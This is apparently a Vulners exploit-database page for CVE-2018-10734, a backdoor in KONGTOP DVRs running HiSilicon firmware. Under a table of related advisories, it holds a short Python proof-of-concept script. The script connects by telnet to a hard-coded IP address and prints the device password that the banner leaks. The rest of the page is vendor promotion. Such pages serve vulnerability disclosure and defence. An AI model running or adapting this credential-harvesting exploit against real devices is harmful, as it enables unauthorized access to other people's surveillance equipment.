| Reporter | Title | Published | Views | Family All 6 |
|---|---|---|---|---|
| Multiple KONGTOP DVR Products Information Disclosure Vulnerability | 10 May 201800:00 | – | cnvd | |
| CVE-2018-10734 | 8 May 201807:00 | – | cve | |
| CVE-2018-10734 | 8 May 201807:00 | – | cvelist | |
| EUVD-2018-2804 | 7 Oct 202500:30 | – | euvd | |
| CVE-2018-10734 | 8 May 201807:29 | – | nvd | |
| Default credentials | 8 May 201807:29 | – | prion |
import socket
'''
@Author: mosin
@Date: 2018-05-04
Description: CVE-2018-10734
KONGTOP DVR backdoor POC
The all DVR Using HiSilicon firmware.
Vulnerability version:
KONGTOP D303 DVR
KONGTOP D305 DVR
KONGTOP D403 DVR
KONGTOP A303 DVR
KONGTOP A403 DVR
Linux kernel��hi3515-hi3531
'''
HOST = "122.117.153.41"
def check():
sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect((HOST,23))
passwd = sock.recv(1024)
passwd = sock.recv(1024)
if "passwd:" in passwd:
print "[*] YES,KONGTOP DVR Vulnerability!\n"
passwd = passwd.replace("(none) login:","")
print "[+] Telnet Pass: " + passwd
else:
print "[-] Sorry,NO Found!"
if __name__ =='__main__':
check()
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation